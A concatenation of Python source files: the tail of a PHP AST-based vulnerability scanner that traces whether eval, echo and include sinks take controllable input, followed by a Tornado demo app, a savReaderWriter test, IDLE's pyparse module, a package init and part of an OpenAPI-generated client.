            analysis([node.else_.node], vul_function, back_node, vul_lineno, file_path, function_params)
if len(node.elseifs) != 0: # elseif语句中的sink点以及变量
for i_node in node.elseifs:
if i_node.node is not None:
if isinstance(i_node.node, php.Block):
analysis(i_node.node.nodes, vul_function, back_node, vul_lineno, file_path, function_params)
else:
nodes.append(i_node.node)
analysis(nodes, vul_function, back_node, vul_lineno, file_path, function_params)
def analysis_echo_print(node, back_node, vul_function, vul_lineno, function_params=None, file_path=None):
"""
    Handle echo/print nodes --> determine the node type --> backtrack in the corresponding branch to decide whether the parameters are controllable --> record the result.
:param file_path:
:param node:
:param back_node:
:param vul_function:
:param vul_lineno:
:param function_params:
:return:
"""
global scan_results
if int(vul_lineno) == int(node.lineno):
if isinstance(node, php.Print):
if isinstance(node.node, php.FunctionCall):
analysis_functioncall_node(node.node, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
if isinstance(node.node, php.Variable) and vul_function == 'print': # 直接输出变量信息
analysis_variable_node(node.node, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
if isinstance(node.node, php.BinaryOp) and vul_function == 'print':
analysis_binaryop_node(node.node, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
if isinstance(node.node, php.ArrayOffset) and vul_function == 'print':
analysis_arrayoffset_node(node.node, vul_function, vul_lineno)
if isinstance(node.node, php.TernaryOp) and vul_function == 'print':
analysis_ternaryop_node(node.node, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
elif isinstance(node, php.Echo):
for k_node in node.nodes:
if isinstance(k_node, php.FunctionCall): # 判断节点中是否有函数调用节点
analysis_functioncall_node(k_node, back_node, vul_function, vul_lineno, function_params,
file_path=file_path) # 将含有函数调用的节点进行分析
if isinstance(k_node, php.Variable) and vul_function == 'echo':
analysis_variable_node(k_node, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
if isinstance(k_node, php.BinaryOp) and vul_function == 'echo':
analysis_binaryop_node(k_node, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
if isinstance(k_node, php.ArrayOffset) and vul_function == 'echo':
analysis_arrayoffset_node(k_node, vul_function, vul_lineno)
if isinstance(k_node, php.TernaryOp) and vul_function == 'echo':
analysis_ternaryop_node(k_node, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
def analysis_return(node, back_node, vul_function, vul_lineno, function_params=None, file_path=None):
"""
    Handle a return node.
:param file_path:
:param node:
:param back_node:
:param vul_function:
:param vul_lineno:
:param function_params:
:return:
"""
global scan_results
if int(vul_lineno) == int(node.lineno) and isinstance(node, php.Return):
if isinstance(node.node, php.FunctionCall):
analysis_functioncall_node(node.node, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
if isinstance(node.node, php.Variable): # 直接输出变量信息
analysis_variable_node(node.node, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
if isinstance(node.node, php.BinaryOp):
analysis_binaryop_node(node.node, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
if isinstance(node.node, php.ArrayOffset):
analysis_arrayoffset_node(node.node, vul_function, vul_lineno)
if isinstance(node.node, php.TernaryOp):
analysis_ternaryop_node(node.node, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
if isinstance(node.node, php.Silence):
nodes = get_silence_params(node.node)
analysis(nodes, vul_function, back_node, vul_lineno, file_path)
def analysis_eval(node, vul_function, back_node, vul_lineno, function_params=None, file_path=None):
"""
    Handle an eval node --> determine the node type --> backtrack in the corresponding branch to decide whether the parameters are controllable --> record the result.
:param file_path:
:param node:
:param vul_function:
:param back_node:
:param vul_lineno:
:param function_params:
:return:
"""
global scan_results
if vul_function == 'eval' and int(node.lineno) == int(vul_lineno):
if isinstance(node.expr, php.Variable):
analysis_variable_node(node.expr, back_node, vul_function, vul_lineno, function_params, file_path=file_path)
if isinstance(node.expr, php.FunctionCall):
analysis_functioncall_node(node.expr, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
if isinstance(node.expr, php.BinaryOp):
analysis_binaryop_node(node.expr, back_node, vul_function, vul_lineno, function_params, file_path=file_path)
if isinstance(node.expr, php.ArrayOffset):
analysis_arrayoffset_node(node.expr, vul_function, vul_lineno)
if isinstance(node.expr, php.ObjectProperty):
analysis_objectproperry_node(node.expr, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
if isinstance(node.expr, php.Silence):
nodes = get_silence_params(node.expr)
analysis(nodes, vul_function, back_node, vul_lineno, file_path)
def analysis_file_inclusion(node, vul_function, back_node, vul_lineno, function_params=None, file_path=None):
"""
    Handle include/require nodes --> determine the node type --> trace back in the matching if branch to decide whether the parameter is controllable --> output the result
:param file_path:
:param node:
:param vul_function:
:param back_node:
:param vul_lineno:
:param function_params:
:return:
"""
global scan_results
include_fs = ['include', 'include_once', 'require', 'require_once']
if vul_function in include_fs and int(node.lineno) == int(vul_lineno):
logger.debug('[AST-INCLUDE] {l}-->{r}'.format(l=vul_function, r=vul_lineno))
if isinstance(node.expr, php.Variable):
analysis_variable_node(node.expr, back_node, vul_function, vul_lineno, function_params, file_path=file_path)
if isinstance(node.expr, php.FunctionCall):
analysis_functioncall_node(node.expr, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
if isinstance(node.expr, php.BinaryOp):
analysis_binaryop_node(node.expr, back_node, vul_function, vul_lineno, function_params, file_path=file_path)
if isinstance(node.expr, php.ArrayOffset):
analysis_arrayoffset_node(node.expr, vul_function, vul_lineno)
if isinstance(node.expr, php.ObjectProperty):
analysis_objectproperry_node(node.expr, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
def set_scan_results(is_co, cp, expr_lineno, sink, param, vul_lineno):
"""
    Collect the result information --> output the result
:param is_co:
:param cp:
:param expr_lineno:
:param sink:
:param param:
:param vul_lineno:
:return:
"""
results = []
global scan_results
result = {
'code': is_co,
'source': cp,
'source_lineno': expr_lineno,
'sink': sink,
        'sink_param': param,
'sink_lineno': vul_lineno
}
    if result['code'] > 0:  # append the detected vulnerability to the scan results
results.append(result)
scan_results += results
def analysis(nodes, vul_function, back_node, vul_lineo, file_path=None, function_params=None):
"""
    Call FunctionCall --> analysis_functioncall to check whether the called function is sensitive
    :param nodes: all nodes
    :param vul_function: name of the sensitive function to check
    :param back_node: statements inside the surrounding syntax structures
    :param vul_lineo: line number of the vulnerable function
    :param function_params: list of all parameters of the user-defined function
    :param file_path: path of the file currently being analyzed
:return:
"""
buffer_ = []
for node in nodes:
        if isinstance(node, php.FunctionCall):  # the function is called directly, without assignment
anlysis_function(node, back_node, vul_function, function_params, vul_lineo, file_path=file_path)
        elif isinstance(node, php.Assignment):  # the function call appears in an assignment expression
if isinstance(node.expr, php.FunctionCall):
anlysis_function(node.expr, back_node, vul_function, function_params, vul_lineo, file_path=file_path)
if isinstance(node.expr, php.Eval):
analysis_eval(node.expr, vul_function, back_node, vul_lineo, function_params, file_path=file_path)
if isinstance(node.expr, php.Silence):
buffer_.append(node.expr)
analysis(buffer_, vul_function, back_node, vul_lineo, file_path, function_params)
elif isinstance(node, php.Return):
analysis_return(node, back_node, vul_function, vul_lineo, function_params, file_path=file_path)
elif isinstance(node, php.Print) or isinstance(node, php.Echo):
analysis_echo_print(node, back_node, vul_function, vul_lineo, function_params, file_path=file_path)
elif isinstance(node, php.Silence):
nodes = get_silence_params(node)
analysis(nodes, vul_function, back_node, vul_lineo, file_path)
elif isinstance(node, php.Eval):
analysis_eval(node, vul_function, back_node, vul_lineo, function_params, file_path=file_path)
elif isinstance(node, php.Include) or isinstance(node, php.Require):
analysis_file_inclusion(node, vul_function, back_node, vul_lineo, function_params, file_path=file_path)
        elif isinstance(node, php.If):  # the function call appears in an if-else statement
analysis_if_else(node, back_node, vul_function, vul_lineo, function_params, file_path=file_path)
        elif isinstance(node, php.While) or isinstance(node, php.For):  # the function call appears in a loop
if isinstance(node.node, php.Block):
analysis(node.node.nodes, vul_function, back_node, vul_lineo, file_path, function_params)
elif isinstance(node, php.Function) or isinstance(node, php.Method):
function_body = []
function_params = get_function_params(node.params)
analysis(node.nodes, vul_function, function_body, vul_lineo, function_params=function_params,
file_path=file_path)
elif isinstance(node, php.Class):
analysis(node.nodes, vul_function, back_node, vul_lineo, file_path, function_params)
back_node.append(node)
def scan_parser(code_content, sensitive_func, vul_lineno, file_path, repair_functions=[]):
"""
    Start the detection
    :param repair_functions:
    :param code_content: content of the file to scan
    :param sensitive_func: sensitive functions to check, passed as a list
    :param vul_lineno: line number of the vulnerable function
    :param file_path: path of the file
:return:
"""
try:
global scan_results, is_repair_functions
scan_results = []
is_repair_functions = repair_functions
parser = make_parser()
all_nodes = parser.parse(code_content, debug=False, lexer=lexer.clone(), tracking=with_line)
        for func in sensitive_func:  # check each sensitive function against the code; if present, recursively check whether its parameters are controllable (the file content is scanned once per function)
back_node = []
analysis(all_nodes, func, back_node, int(vul_lineno), file_path, function_params=None)
except SyntaxError as e:
logger.warning('[AST] [ERROR]:{e}'.format(e=e))
return scan_results
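# A minimal usage sketch (an assumption, not part of the original module): the target file
# and sink list below are placeholders, and scan_parser() relies on the module-level
# parser, lexer and with_line objects defined earlier in this file.
#
#   code = open('target.php').read()
#   results = scan_parser(code, ['eval', 'system'], vul_lineno=12, file_path='target.php')
#   for r in results:
#       print(r['sink'], r['sink_lineno'], r['source'])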
|
py | b4001cb043f960de32c8756142d83c2ffb41848d | import tornado.web
import tornado.httpserver
import tornado.ioloop
import tornado.options
import os.path
from tornado.options import define, options
define("port", default=8000, help="run on the given port", type=int)
class HelloHandler(tornado.web.RequestHandler):
def get(self):
self.render('hello.html')
class HelloModule(tornado.web.UIModule):
def render(self):
return '<h1>Hello, world!</h1>'
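# Note (assumption about the accompanying template): with the module registered under the
# name 'Hello', hello.html can embed it with the standard Tornado tag {% module Hello() %}.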
if __name__ == '__main__':
tornado.options.parse_command_line()
app = tornado.web.Application(
handlers=[(r'/', HelloHandler)],
template_path=os.path.join(os.path.dirname(__file__), 'templates'),
        ui_modules={'Hello': HelloModule}
)
server = tornado.httpserver.HTTPServer(app)
server.listen(options.port)
tornado.ioloop.IOLoop.instance().start() |
py | b4001cc0b626abd15fbf81fa475b8e62fa8db364 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import unittest
import os
import sys
from os.path import basename, join
import tempfile
import zipfile
import savReaderWriter as rw
is_windows = sys.platform.startswith("win")
# issue #35: IOError with umlauts in path to a file for sav.SavReader
# Mostly a Windows-specific thing, see generic.Generic.wideCharToMultiByte
class Test_NonAsciiSavFileName(unittest.TestCase):
def func(self, savFileName):
self.outfile = tempfile.mktemp(suffix="_out.sav")
with rw.SavWriter(self.outfile, [b'v1'], {b'v1': 0}) as writer:
for i in range(10):
writer.writerow([i])
with rw.SavReader(self.outfile) as reader:
self.assertEqual(reader.all(False), [[float(i)] for i in range(10)])
self.assertTrue(os.path.exists(self.outfile))
def test_nonascii_u_filename_german(self):
u_savFileName = u"test_data/scheiß Encoding.sav"
self.func(u_savFileName)
@unittest.skipIf(is_windows, "Chinese in a Western European windows?")
def test_nonascii_u_filename_chinese(self):
# file is zipped: Chinese chars cause errors with .whl creation in Win
zipFileName = "test_data/chinese_chars.sav.zip"
zf = zipfile.ZipFile(zipFileName)
u_savFileName = zf.infolist()[0].filename
u_savFileName = join(tempfile.gettempdir(), u_savFileName)
with open(u_savFileName, "wb") as f:
f.write(zf.read(basename(u_savFileName)))
self.func(u_savFileName)
os.remove(u_savFileName)
def test_nonascii_b_filename(self):
b_savFileName = b"test_data/schei\xdf Encoding.sav"
self.func(b_savFileName)
def tearDown(self):
try:
os.remove(self.outfile)
except:
pass
if __name__ == "__main__":
unittest.main()
|
py | b4001cebc7c5779e13bd95d5b25cc7fc8254e186 | """Define partial Python code Parser used by editor and hyperparser.
Instances of ParseMap are used with str.translate.
The following bound search and match functions are defined:
_synchre - start of popular statement;
_junkre - whitespace or comment line;
_match_stringre: string, possibly without closer;
_itemre - line that may have bracket structure start;
_closere - line that must be followed by dedent.
_chew_ordinaryre - non-special characters.
"""
import re
# Reason last statement is continued (or C_NONE if it's not).
(C_NONE, C_BACKSLASH, C_STRING_FIRST_LINE,
C_STRING_NEXT_LINES, C_BRACKET) = range(5)
# Find what looks like the start of a popular statement.
_synchre = re.compile(r"""
^
[ \t]*
(?: while
| else
| def
| return
| assert
| break
| class
| continue
| elif
| try
| except
| raise
| import
| yield
)
\b
""", re.VERBOSE | re.MULTILINE).search
# Match blank line or non-indenting comment line.
_junkre = re.compile(r"""
[ \t]*
(?: \# \S .* )?
\n
""", re.VERBOSE).match
# Match any flavor of string; the terminating quote is optional
# so that we're robust in the face of incomplete program text.
_match_stringre = re.compile(r"""
\""" [^"\\]* (?:
(?: \\. | "(?!"") )
[^"\\]*
)*
(?: \""" )?
| " [^"\\\n]* (?: \\. [^"\\\n]* )* "?
| ''' [^'\\]* (?:
(?: \\. | '(?!'') )
[^'\\]*
)*
(?: ''' )?
| ' [^'\\\n]* (?: \\. [^'\\\n]* )* '?
""", re.VERBOSE | re.DOTALL).match
# Match a line that starts with something interesting;
# used to find the first item of a bracket structure.
_itemre = re.compile(r"""
[ \t]*
[^\s#\\] # if we match, m.end()-1 is the interesting char
""", re.VERBOSE).match
# Match start of statements that should be followed by a dedent.
_closere = re.compile(r"""
\s*
(?: return
| break
| continue
| raise
| pass
)
\b
""", re.VERBOSE).match
# Chew up non-special chars as quickly as possible. If match is
# successful, m.end() less 1 is the index of the last boring char
# matched. If match is unsuccessful, the string starts with an
# interesting char.
_chew_ordinaryre = re.compile(r"""
[^[\](){}#'"\\]+
""", re.VERBOSE).match
class ParseMap(dict):
r"""Dict subclass that maps anything not in dict to 'x'.
This is designed to be used with str.translate in study1.
Anything not specifically mapped otherwise becomes 'x'.
Example: replace everything except whitespace with 'x'.
>>> keepwhite = ParseMap((ord(c), ord(c)) for c in ' \t\n\r')
>>> "a + b\tc\nd".translate(keepwhite)
'x x x\tx\nx'
"""
# Calling this triples access time; see bpo-32940
def __missing__(self, key):
return 120 # ord('x')
# Map all ascii to 120 to avoid __missing__ call, then replace some.
trans = ParseMap.fromkeys(range(128), 120)
trans.update((ord(c), ord('(')) for c in "({[") # open brackets => '(';
trans.update((ord(c), ord(')')) for c in ")}]") # close brackets => ')'.
trans.update((ord(c), ord(c)) for c in "\"'\\\n#") # Keep these.
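# Rough illustration (added example, not from the original source): after translation,
# brackets survive as '(' / ')' and almost everything else becomes 'x', e.g.
#   "a[i] = b\n".translate(trans)  ->  'x(x)xxxx\n'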
class Parser:
def __init__(self, indentwidth, tabwidth):
self.indentwidth = indentwidth
self.tabwidth = tabwidth
def set_code(self, s):
assert len(s) == 0 or s[-1] == '\n'
self.code = s
self.study_level = 0
def find_good_parse_start(self, is_char_in_string=None,
_synchre=_synchre):
"""
Return index of a good place to begin parsing, as close to the
end of the string as possible. This will be the start of some
popular stmt like "if" or "def". Return None if none found:
the caller should pass more prior context then, if possible, or
if not (the entire program text up until the point of interest
has already been tried) pass 0 to set_lo().
This will be reliable iff given a reliable is_char_in_string()
function, meaning that when it says "no", it's absolutely
guaranteed that the char is not in a string.
"""
code, pos = self.code, None
if not is_char_in_string:
# no clue -- make the caller pass everything
return None
# Peek back from the end for a good place to start,
# but don't try too often; pos will be left None, or
# bumped to a legitimate synch point.
limit = len(code)
for tries in range(5):
i = code.rfind(":\n", 0, limit)
if i < 0:
break
i = code.rfind('\n', 0, i) + 1 # start of colon line (-1+1=0)
m = _synchre(code, i, limit)
if m and not is_char_in_string(m.start()):
pos = m.start()
break
limit = i
if pos is None:
# Nothing looks like a block-opener, or stuff does
# but is_char_in_string keeps returning true; most likely
# we're in or near a giant string, the colorizer hasn't
# caught up enough to be helpful, or there simply *aren't*
# any interesting stmts. In any of these cases we're
# going to have to parse the whole thing to be sure, so
# give it one last try from the start, but stop wasting
# time here regardless of the outcome.
m = _synchre(code)
if m and not is_char_in_string(m.start()):
pos = m.start()
return pos
# Peeking back worked; look forward until _synchre no longer
# matches.
i = pos + 1
while 1:
m = _synchre(code, i)
if m:
s, i = m.span()
if not is_char_in_string(s):
pos = s
else:
break
return pos
def set_lo(self, lo):
""" Throw away the start of the string.
Intended to be called with the result of find_good_parse_start().
"""
assert lo == 0 or self.code[lo-1] == '\n'
if lo > 0:
self.code = self.code[lo:]
def _study1(self):
"""Find the line numbers of non-continuation lines.
As quickly as humanly possible <wink>, find the line numbers (0-
based) of the non-continuation lines.
Creates self.{goodlines, continuation}.
"""
if self.study_level >= 1:
return
self.study_level = 1
# Map all uninteresting characters to "x", all open brackets
# to "(", all close brackets to ")", then collapse runs of
# uninteresting characters. This can cut the number of chars
# by a factor of 10-40, and so greatly speed the following loop.
code = self.code
code = code.translate(trans)
code = code.replace('xxxxxxxx', 'x')
code = code.replace('xxxx', 'x')
code = code.replace('xx', 'x')
code = code.replace('xx', 'x')
code = code.replace('\nx', '\n')
# Replacing x\n with \n would be incorrect because
# x may be preceded by a backslash.
# March over the squashed version of the program, accumulating
# the line numbers of non-continued stmts, and determining
# whether & why the last stmt is a continuation.
continuation = C_NONE
level = lno = 0 # level is nesting level; lno is line number
self.goodlines = goodlines = [0]
push_good = goodlines.append
i, n = 0, len(code)
while i < n:
ch = code[i]
i = i+1
# cases are checked in decreasing order of frequency
if ch == 'x':
continue
if ch == '\n':
lno = lno + 1
if level == 0:
push_good(lno)
# else we're in an unclosed bracket structure
continue
if ch == '(':
level = level + 1
continue
if ch == ')':
if level:
level = level - 1
# else the program is invalid, but we can't complain
continue
if ch == '"' or ch == "'":
# consume the string
quote = ch
if code[i-1:i+2] == quote * 3:
quote = quote * 3
firstlno = lno
w = len(quote) - 1
i = i+w
while i < n:
ch = code[i]
i = i+1
if ch == 'x':
continue
if code[i-1:i+w] == quote:
i = i+w
break
if ch == '\n':
lno = lno + 1
if w == 0:
# unterminated single-quoted string
if level == 0:
push_good(lno)
break
continue
if ch == '\\':
assert i < n
if code[i] == '\n':
lno = lno + 1
i = i+1
continue
# else comment char or paren inside string
else:
# didn't break out of the loop, so we're still
# inside a string
if (lno - 1) == firstlno:
# before the previous \n in code, we were in the first
# line of the string
continuation = C_STRING_FIRST_LINE
else:
continuation = C_STRING_NEXT_LINES
continue # with outer loop
if ch == '#':
# consume the comment
i = code.find('\n', i)
assert i >= 0
continue
assert ch == '\\'
assert i < n
if code[i] == '\n':
lno = lno + 1
if i+1 == n:
continuation = C_BACKSLASH
i = i+1
# The last stmt may be continued for all 3 reasons.
# String continuation takes precedence over bracket
# continuation, which beats backslash continuation.
if (continuation != C_STRING_FIRST_LINE
and continuation != C_STRING_NEXT_LINES and level > 0):
continuation = C_BRACKET
self.continuation = continuation
# Push the final line number as a sentinel value, regardless of
# whether it's continued.
assert (continuation == C_NONE) == (goodlines[-1] == lno)
if goodlines[-1] != lno:
push_good(lno)
def get_continuation_type(self):
self._study1()
return self.continuation
def _study2(self):
"""
study1 was sufficient to determine the continuation status,
but doing more requires looking at every character. study2
does this for the last interesting statement in the block.
Creates:
self.stmt_start, stmt_end
slice indices of last interesting stmt
self.stmt_bracketing
the bracketing structure of the last interesting stmt; for
example, for the statement "say(boo) or die",
stmt_bracketing will be ((0, 0), (0, 1), (2, 0), (2, 1),
(4, 0)). Strings and comments are treated as brackets, for
the matter.
self.lastch
last interesting character before optional trailing comment
self.lastopenbracketpos
if continuation is C_BRACKET, index of last open bracket
"""
if self.study_level >= 2:
return
self._study1()
self.study_level = 2
# Set p and q to slice indices of last interesting stmt.
code, goodlines = self.code, self.goodlines
i = len(goodlines) - 1 # Index of newest line.
p = len(code) # End of goodlines[i]
while i:
assert p
# Make p be the index of the stmt at line number goodlines[i].
# Move p back to the stmt at line number goodlines[i-1].
q = p
for nothing in range(goodlines[i-1], goodlines[i]):
# tricky: sets p to 0 if no preceding newline
p = code.rfind('\n', 0, p-1) + 1
# The stmt code[p:q] isn't a continuation, but may be blank
# or a non-indenting comment line.
if _junkre(code, p):
i = i-1
else:
break
if i == 0:
# nothing but junk!
assert p == 0
q = p
self.stmt_start, self.stmt_end = p, q
# Analyze this stmt, to find the last open bracket (if any)
# and last interesting character (if any).
lastch = ""
stack = [] # stack of open bracket indices
push_stack = stack.append
bracketing = [(p, 0)]
while p < q:
# suck up all except ()[]{}'"#\\
m = _chew_ordinaryre(code, p, q)
if m:
# we skipped at least one boring char
newp = m.end()
# back up over totally boring whitespace
i = newp - 1 # index of last boring char
while i >= p and code[i] in " \t\n":
i = i-1
if i >= p:
lastch = code[i]
p = newp
if p >= q:
break
ch = code[p]
if ch in "([{":
push_stack(p)
bracketing.append((p, len(stack)))
lastch = ch
p = p+1
continue
if ch in ")]}":
if stack:
del stack[-1]
lastch = ch
p = p+1
bracketing.append((p, len(stack)))
continue
if ch == '"' or ch == "'":
# consume string
# Note that study1 did this with a Python loop, but
# we use a regexp here; the reason is speed in both
# cases; the string may be huge, but study1 pre-squashed
# strings to a couple of characters per line. study1
# also needed to keep track of newlines, and we don't
# have to.
bracketing.append((p, len(stack)+1))
lastch = ch
p = _match_stringre(code, p, q).end()
bracketing.append((p, len(stack)))
continue
if ch == '#':
# consume comment and trailing newline
bracketing.append((p, len(stack)+1))
p = code.find('\n', p, q) + 1
assert p > 0
bracketing.append((p, len(stack)))
continue
assert ch == '\\'
p = p+1 # beyond backslash
assert p < q
if code[p] != '\n':
# the program is invalid, but can't complain
lastch = ch + code[p]
p = p+1 # beyond escaped char
# end while p < q:
self.lastch = lastch
self.lastopenbracketpos = stack[-1] if stack else None
self.stmt_bracketing = tuple(bracketing)
def compute_bracket_indent(self):
"""Return number of spaces the next line should be indented.
Line continuation must be C_BRACKET.
"""
self._study2()
assert self.continuation == C_BRACKET
j = self.lastopenbracketpos
code = self.code
n = len(code)
origi = i = code.rfind('\n', 0, j) + 1
j = j+1 # one beyond open bracket
# find first list item; set i to start of its line
while j < n:
m = _itemre(code, j)
if m:
j = m.end() - 1 # index of first interesting char
extra = 0
break
else:
# this line is junk; advance to next line
i = j = code.find('\n', j) + 1
else:
# nothing interesting follows the bracket;
# reproduce the bracket line's indentation + a level
j = i = origi
while code[j] in " \t":
j = j+1
extra = self.indentwidth
return len(code[i:j].expandtabs(self.tabwidth)) + extra
def get_num_lines_in_stmt(self):
"""Return number of physical lines in last stmt.
The statement doesn't have to be an interesting statement. This is
intended to be called when continuation is C_BACKSLASH.
"""
self._study1()
goodlines = self.goodlines
return goodlines[-1] - goodlines[-2]
def compute_backslash_indent(self):
"""Return number of spaces the next line should be indented.
Line continuation must be C_BACKSLASH. Also assume that the new
line is the first one following the initial line of the stmt.
"""
self._study2()
assert self.continuation == C_BACKSLASH
code = self.code
i = self.stmt_start
while code[i] in " \t":
i = i+1
startpos = i
# See whether the initial line starts an assignment stmt; i.e.,
# look for an = operator
endpos = code.find('\n', startpos) + 1
found = level = 0
while i < endpos:
ch = code[i]
if ch in "([{":
level = level + 1
i = i+1
elif ch in ")]}":
if level:
level = level - 1
i = i+1
elif ch == '"' or ch == "'":
i = _match_stringre(code, i, endpos).end()
elif ch == '#':
# This line is unreachable because the # makes a comment of
# everything after it.
break
elif level == 0 and ch == '=' and \
(i == 0 or code[i-1] not in "=<>!") and \
code[i+1] != '=':
found = 1
break
else:
i = i+1
if found:
# found a legit =, but it may be the last interesting
# thing on the line
i = i+1 # move beyond the =
found = re.match(r"\s*\\", code[i:endpos]) is None
if not found:
# oh well ... settle for moving beyond the first chunk
# of non-whitespace chars
i = startpos
while code[i] not in " \t\n":
i = i+1
return len(code[self.stmt_start:i].expandtabs(\
self.tabwidth)) + 1
def get_base_indent_string(self):
"""Return the leading whitespace on the initial line of the last
interesting stmt.
"""
self._study2()
i, n = self.stmt_start, self.stmt_end
j = i
code = self.code
while j < n and code[j] in " \t":
j = j + 1
return code[i:j]
def is_block_opener(self):
"Return True if the last interesting statement opens a block."
self._study2()
return self.lastch == ':'
def is_block_closer(self):
"Return True if the last interesting statement closes a block."
self._study2()
return _closere(self.code, self.stmt_start) is not None
def get_last_stmt_bracketing(self):
"""Return bracketing structure of the last interesting statement.
The returned tuple is in the format defined in _study2().
"""
self._study2()
return self.stmt_bracketing
if __name__ == '__main__':
from unittest import main
main('idlelib.idle_test.test_pyparse', verbosity=2)
|
py | b4001e0ff769c6d86baec1de9916d3bd42cdbd35 | # Copyright 2021 SpinQ Technology Co., Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .backend import *
from .basic_simulator_backend import BasicSimulatorConfig
from .triangulum_backend import TriangulumConfig |
py | b4001e33f95ab1f28c83dd42a9456a2a59d024bf | # coding: utf-8
"""
OpenAPI Extension x-auth-id-alias
This specification shows how to use x-auth-id-alias extension for API keys. # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import json
import atexit
import mimetypes
from multiprocessing.pool import ThreadPool
import os
import re
# python 2 and python 3 compatibility library
import six
from six.moves.urllib.parse import quote
from x_auth_id_alias import rest
from x_auth_id_alias.configuration import Configuration
from x_auth_id_alias.exceptions import ApiValueError, ApiException
from x_auth_id_alias.model_utils import (
ModelNormal,
ModelSimple,
ModelComposed,
date,
datetime,
deserialize_file,
file_type,
model_to_dict,
str,
validate_and_convert_types
)
class ApiClient(object):
"""Generic API client for OpenAPI client library builds.
OpenAPI generic API client. This client handles the client-
server communication, and is invariant across implementations. Specifics of
the methods and models for each application are generated from the OpenAPI
templates.
NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
:param configuration: .Configuration object for this client
:param header_name: a header to pass when making calls to the API.
:param header_value: a header value to pass when making calls to
the API.
:param cookie: a cookie to include in the header when making calls
to the API
:param pool_threads: The number of threads to use for async requests
to the API. More threads means more concurrent API requests.
"""
# six.binary_type python2=str, python3=bytes
# six.text_type python2=unicode, python3=str
PRIMITIVE_TYPES = (
(float, bool, six.binary_type, six.text_type) + six.integer_types
)
_pool = None
def __init__(self, configuration=None, header_name=None, header_value=None,
cookie=None, pool_threads=1):
if configuration is None:
configuration = Configuration()
self.configuration = configuration
self.pool_threads = pool_threads
self.rest_client = rest.RESTClientObject(configuration)
self.default_headers = {}
if header_name is not None:
self.default_headers[header_name] = header_value
self.cookie = cookie
# Set default User-Agent.
self.user_agent = 'OpenAPI-Generator/1.0.0/python'
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
def close(self):
if self._pool:
self._pool.close()
self._pool.join()
self._pool = None
if hasattr(atexit, 'unregister'):
atexit.unregister(self.close)
@property
def pool(self):
"""Create thread pool on first request
avoids instantiating unused threadpool for blocking clients.
"""
if self._pool is None:
atexit.register(self.close)
self._pool = ThreadPool(self.pool_threads)
return self._pool
@property
def user_agent(self):
"""User agent for this API client"""
return self.default_headers['User-Agent']
@user_agent.setter
def user_agent(self, value):
self.default_headers['User-Agent'] = value
def set_default_header(self, header_name, header_value):
self.default_headers[header_name] = header_value
def __call_api(
self, resource_path, method, path_params=None,
query_params=None, header_params=None, body=None, post_params=None,
files=None, response_type=None, auth_settings=None,
_return_http_data_only=None, collection_formats=None,
_preload_content=True, _request_timeout=None, _host=None,
_check_type=None):
config = self.configuration
# header parameters
header_params = header_params or {}
header_params.update(self.default_headers)
if self.cookie:
header_params['Cookie'] = self.cookie
if header_params:
header_params = self.sanitize_for_serialization(header_params)
header_params = dict(self.parameters_to_tuples(header_params,
collection_formats))
# path parameters
if path_params:
path_params = self.sanitize_for_serialization(path_params)
path_params = self.parameters_to_tuples(path_params,
collection_formats)
for k, v in path_params:
# specified safe chars, encode everything
resource_path = resource_path.replace(
'{%s}' % k,
quote(str(v), safe=config.safe_chars_for_path_param)
)
# query parameters
if query_params:
query_params = self.sanitize_for_serialization(query_params)
query_params = self.parameters_to_tuples(query_params,
collection_formats)
# post parameters
if post_params or files:
post_params = post_params if post_params else []
post_params = self.sanitize_for_serialization(post_params)
post_params = self.parameters_to_tuples(post_params,
collection_formats)
post_params.extend(self.files_parameters(files))
# body
if body:
body = self.sanitize_for_serialization(body)
# auth setting
self.update_params_for_auth(header_params, query_params,
auth_settings, resource_path, method, body)
# request url
if _host is None:
url = self.configuration.host + resource_path
else:
# use server/host defined in path or operation instead
url = _host + resource_path
try:
# perform request and return response
response_data = self.request(
method, url, query_params=query_params, headers=header_params,
post_params=post_params, body=body,
_preload_content=_preload_content,
_request_timeout=_request_timeout)
except ApiException as e:
e.body = e.body.decode('utf-8') if six.PY3 else e.body
raise e
content_type = response_data.getheader('content-type')
self.last_response = response_data
return_data = response_data
if not _preload_content:
            return (return_data)
if six.PY3 and response_type not in ["file", "bytes"]:
match = None
if content_type is not None:
match = re.search(r"charset=([a-zA-Z\-\d]+)[\s\;]?", content_type)
encoding = match.group(1) if match else "utf-8"
response_data.data = response_data.data.decode(encoding)
# deserialize response data
if response_type:
return_data = self.deserialize(
response_data,
response_type,
_check_type
)
else:
return_data = None
if _return_http_data_only:
return (return_data)
else:
return (return_data, response_data.status,
response_data.getheaders())
def sanitize_for_serialization(self, obj):
"""Builds a JSON POST object.
If obj is None, return None.
If obj is str, int, long, float, bool, return directly.
If obj is datetime.datetime, datetime.date
convert to string in iso8601 format.
If obj is list, sanitize each element in the list.
If obj is dict, return the dict.
If obj is OpenAPI model, return the properties dict.
:param obj: The data to serialize.
:return: The serialized form of data.
"""
if obj is None:
return None
elif isinstance(obj, self.PRIMITIVE_TYPES):
return obj
elif isinstance(obj, list):
